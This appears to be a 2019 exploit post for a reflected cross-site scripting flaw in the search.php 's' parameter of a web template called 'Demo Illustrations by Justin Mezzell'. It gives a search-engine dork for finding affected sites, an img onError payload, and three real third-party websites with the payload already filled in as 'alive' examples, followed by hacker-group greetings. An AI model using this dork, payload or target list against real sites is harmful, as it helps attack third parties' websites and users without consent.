# [+] Title : Demo Illustrations by Justin Mezzell reflected XSS
# [+] Author (Discover) : ABDO10
# [+] Date : Jun, 16th 2019
# [+] Dork : allintext:"Demo Illustrations by Justin Mezzell"
# [+] Poc Instructions :
+ We have to dork in search engine
+ we have to set payload on the vulnerable file "search.php" in the parameter "s"
+ E.g [target]/[path]/search.php?s=<img src="xy" onError=prompt(document.domain)>
# [+] Alive E.g :
+ http://www.plasticosajaco.com/search.php?s=<img src="xy" onError=prompt(document.domain)>
+ https://nokesolutions.com/samples/codester/search.php?s=<img src="xy" onError=prompt(document.domain)>
+ http://schoolnepal.org/search.php?s=<img src="xy" onError=prompt(document.domain)>
``... and more ... This the real hacking #ahmed cmd``
`` Greetz Lakarha_Family ``